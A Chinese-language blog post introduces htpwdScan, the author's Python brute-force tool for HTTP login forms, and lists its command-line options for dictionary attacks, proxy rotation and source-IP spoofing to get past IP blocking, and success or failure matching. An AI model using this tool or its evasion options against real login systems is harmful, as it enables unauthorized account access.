htpwdScan HTTP弱口令扫描器(python)

脚本还在不断完善，目前已经可以通过批量导入代理来突破IP限制，密码可hash: MD5、SHA1。

可以通过设定重试条件来解决不稳定主机和ngix指向不同后端的问题（即便4次请求只有一次能正确访问到后台，程序也能破解出账号）。

正在添加对HTTP Basic认证的支持，会考虑加入简单验证码识别。也会考虑做一个GUI工具。啊，有点跑偏了

弱口令破解是我最常用的攻击方式之一。 这种攻击方法对用户量庞大、没有做IP请求限制、没有做密码安全规则、错误提示过于详细的系统，几乎是通杀的。

上周，利用一点时间，我把以前写的暴力破解脚本片段，整理成了一个通用的HTTP暴力破解工具。感谢组里的同事，小松、亮哥对我工作的支持呐。

鉴于是初步实现，肯定有很多不足。 我是想到什么就加进去，所以思路可能有点乱。

optional arguments:  -h, --help            show this help message and exit  -f REQUESTFILE        Load HTTP request from file  -https                Set -https only when load request from file and                        HTTPS was enabled  -u REQUESTURL         Explicitly Set request URL, e.g.                        -u="http://www.test.com/login.php"  -m METHOD             Set -m=GET only when -u was set and request method                        is GET,default is POST  -d Param=DictFilePath [Param=DictFilePath ...]                        set dict file for each parameter,                        support hash functions like md5, md5_16, sha1. e.g.                        -d user=users.dic pass=md5(pass.dic)  -no302                302 redirect insensitive, default is sensitive  -err ERR [ERR ...]    String indicates fail in response text, e.g.                        -err "user not exist" "password wrong"  -suc SUC [SUC ...]    String indicates success in response text, e.g.                        -suc "welcome," "admin"  -herr HERR            String indicates fail in response headers  -hsuc HSUC            String indicates success in response headers  -proxy Server:Port    Set HTTP proxies, e.g.                        -proxy=127.0.0.1:8000,8.8.8.8:8000  -proxylist ProxyListFile                        Load HTTP proxies from file, one proxy per line, e.g.                        -proxylist=proxys.txt  -fip                  Spoof source IP  -t THREADS            50 threads by default  -o OUTPUT             Output file, defaut is Cracked_Pass.txt  -rtxt RetryText       Retry when it appears in response text,                        e.g. -rtxt="IP blocked"  -rntxt RetryNoText    Retry when it does not appear in response text,                        e.g. -rntxt=""  -rheader RetryHeader  Retry when it appears in response headers,                        e.g. -rheader="Set-Cookie:"  -rnheader RetryNoHeader                        Retry when it didn't appear in response headers,                        e.g. -rheader="Content-Length:"  -sleep SECONDS        Sleep some time after each request,                        avoid IP blocked by web server  -debug                Send a request and check                        response headers and response text  -nov                  Do not print verbose info, only print the cracked ones  -v                    show program's version number and exit

获取脚本： https://github.com/lijiejie/htpwdScan

基本用法稍后单独写一篇日志说明。 ?自己写的小工具，若有自己用着才顺手，自然是不好的。。。